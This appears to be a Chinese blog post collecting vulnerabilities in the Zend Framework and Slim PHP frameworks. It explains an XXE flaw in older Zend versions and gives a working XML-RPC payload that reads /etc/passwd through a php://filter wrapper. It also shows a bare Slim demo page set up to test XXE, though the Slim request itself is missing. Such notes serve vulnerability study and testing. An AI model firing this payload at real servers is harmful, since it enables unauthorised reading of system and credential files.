zend及Slim 漏洞合集

zend漏洞

zend framework文件读取漏洞分析

Zend Framework 1.11.13、1.12.0之前版本内的(1) Zend_Dom, (2) Zend_Feed, (3) Zend_Soap没有正确处理SimpleXMLElement类,这使得远程攻击者可利用XML-RPC请求中DOCTYPE元素内的外部实体引用(external entity reference)注入攻击,从而读取任意文件或创建TCP连接。

poc:

<?xml version="1.0"?> 
<!DOCTYPE foo [   
  <!ELEMENT methodName ANY > 
  <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passswd" >]> 
<methodCall> 
  <methodName>&xxe;</methodName> 
</methodCall>

Zend Framework远程执行代码漏洞

poc的链接

Slim 漏洞

Slim XXE漏洞

编写一个最简单的demo页面,只有一个获取POST信息并输出的功能:

<?php
require 'vendor/autoload.php';
$app = new \Slim\App();
$app->post("/post", function($request, $response) {
    $parsedBody = $request->getParsedBody();
    print_r($parsedBody);
});
$app->run();

搭建在自己的服务器

正常请求

触发XXE漏洞并读取/etc/passwd:

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值